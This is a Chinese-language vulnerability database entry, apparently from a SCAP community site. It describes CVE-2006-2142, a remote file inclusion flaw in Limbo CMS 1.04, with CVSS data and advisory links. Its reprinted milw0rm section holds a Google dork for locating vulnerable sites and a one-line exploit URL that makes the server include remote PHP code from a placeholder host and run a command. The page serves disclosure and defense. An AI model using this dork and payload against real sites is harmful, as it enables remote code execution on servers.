CVE-2006-2142
CVSS6.4
发布时间 :2006-05-02 06:02:00
修订时间 :2011-03-07 21:35:26
NMCOE    

[原文]PHP remote file inclusion vulnerability in classes/adodbt/sql.php in Limbo CMS 1.04 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter.


[CNNVD]Limbo CMS sql.php 远程文件包含漏洞(CNNVD-200605-034)

        Limbo是一种开源的基于PHP的Web内容管理系统。
        Limbo对用户请求的处理上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        Limbo的sql.php脚本对classes_dir变量数据没有做充分的检查过程,远程攻击者可以通过此变量使Limbo包含远端主机上的PHP脚本,导致以Web进程权限在服务器上执行任意命令。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:limbo_cms:limbo_cms:1.0.4.2
cpe:/a:limbo_cms:limbo_cms:1.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2142
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2142
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-034
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1584
(UNKNOWN)  VUPEN  ADV-2006-1584
http://secunia.com/advisories/19891
(VENDOR_ADVISORY)  SECUNIA  19891
http://milw0rm.com/exploits/1729
(UNKNOWN)  MILW0RM  1729
http://xforce.iss.net/xforce/xfdb/26196
(UNKNOWN)  XF  webinsta-limbo-sql-fil-include(26196)
http://www.securityfocus.com/bid/17760
(UNKNOWN)  BID  17760
http://www.securityfocus.com/archive/1/archive/1/446142/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060913 Limbo - Lite Mambo CMS Multiple Vulnerabilities
http://www.osvdb.org/25155
(UNKNOWN)  OSVDB  25155

- 漏洞信息

Limbo CMS sql.php 远程文件包含漏洞
中危 输入验证
2006-05-02 00:00:00 2006-05-03 00:00:00
远程  
        Limbo是一种开源的基于PHP的Web内容管理系统。
        Limbo对用户请求的处理上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        Limbo的sql.php脚本对classes_dir变量数据没有做充分的检查过程,远程攻击者可以通过此变量使Limbo包含远端主机上的PHP脚本,导致以Web进程权限在服务器上执行任意命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.limbo-cms.com/

- 漏洞信息 (1729)

Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability (EDBID:1729)
php webapps
2006-04-29 Verified
0 [Oo]
N/A [点击下载]
Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]
		

- 漏洞信息

25155
Limbo CMS sql.php classes_dir Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

WEBInsta Limbo contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sql.php not properly sanitizing user input supplied to the 'classes_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-29 Unknow
2006-04-29 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站